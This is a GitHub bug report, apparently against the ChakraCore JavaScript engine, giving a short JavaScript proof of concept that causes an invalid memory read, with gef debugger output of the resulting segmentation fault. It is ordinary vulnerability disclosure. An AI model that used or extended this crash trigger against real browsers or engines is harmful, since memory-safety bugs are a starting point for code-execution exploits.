Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Invalid_memory_read_1 #6644

Open
bird8693 opened this issue Mar 17, 2021 · 0 comments
Open

Invalid_memory_read_1 #6644

bird8693 opened this issue Mar 17, 2021 · 0 comments

Comments

@bird8693
Copy link

enviroment

ubuntu16

poc

this.x = 4660;
function Ctor() {
    n = new Set();
}
function Check() {
    this.__defineSetter__('x', () => {
    });
    var mWaN = new Number();
    var Bjfc = ~-Infinity;
    parseInt();
}
for (var i = 0; i < 2000; ++i) {
    Ctor();
    var WGey = DataView;
    var yPDd = new Boolean();
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        var EdHR = Proxy;
    }
    Check();
    var TmET = !673720360;
    var wcwb = new Uint32Array([
        -9007199254740992,
        3037000498,
        4294967297,
        -9007199254740991,
        2147483649,
        1e-15,
        2147483648
    ]);
}
for (var i = 0; i < 2000; ++i) {
    Check();
    var yPDd = new Boolean();
}
Ctor();
let x = 1;
Check();

gef output

   0x7ffff7e4540c                  mov    rax, rdi
   0x7ffff7e4540f                  shr    rax, 0x30
   0x7ffff7e45413                  jne    0x7ffff7e45ba1
 → 0x7ffff7e45419                  mov    rax, QWORD PTR [rdi+0x8]
   0x7ffff7e4541d                  mov    rax, QWORD PTR [rax+0x18]
   0x7ffff7e45421                  movabs rdx, 0x7ffff7f26020
   0x7ffff7e4542b                  mov    rsi, 0x10000001
   0x7ffff7e45432                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e45437                  mov    QWORD PTR [rsp+0x8], rsi
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e45419 in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1360 in pthread_cond_wait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e45419 → mov rax, QWORD PTR [rdi+0x8]
[#1] 0x7fff00000002 → add BYTE PTR [rax], al
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bird8693